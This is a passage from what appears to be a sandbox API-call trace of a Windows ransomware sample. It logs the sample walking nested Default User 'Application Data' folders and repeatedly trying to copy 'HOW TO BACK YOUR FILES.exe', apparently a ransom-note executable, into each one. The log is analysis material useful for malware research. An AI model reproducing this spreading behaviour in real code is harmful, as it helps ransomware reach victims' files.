Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0066.087] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0066.087] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.087] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.089] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.089] GetLastError () returned 0x0 [0066.089] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.089] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.089] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0066.090] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0066.090] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.090] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.090] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.090] GetLastError () returned 0x0 [0066.090] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.090] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.091] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0066.091] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0066.091] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.091] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.092] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.092] GetLastError () returned 0x0 [0066.092] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.092] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559a4d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559a4d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.092] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0066.092] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0066.092] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.092] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.093] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.093] GetLastError () returned 0x0 [0066.093] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.093] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.094] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0066.094] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0066.094] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.094] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.094] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.094] GetLastError () returned 0x0 [0066.095] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.095] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.095] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0066.095] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0066.095] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.095] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.096] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.096] GetLastError () returned 0x0 [0066.096] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.096] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559cae60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559cae60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.096] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0066.096] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0066.096] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.096] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.097] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.097] GetLastError () returned 0x0 [0066.097] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.097] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x574201c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x574201c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.097] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0066.098] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0066.098] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.098] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.098] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.098] GetLastError () returned 0x0 [0066.098] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.098] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.099] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0066.099] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0066.099] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.099] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.099] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.100] GetLastError () returned 0x0 [0066.100] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.100] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.100] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0066.100] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0066.100] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.100] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 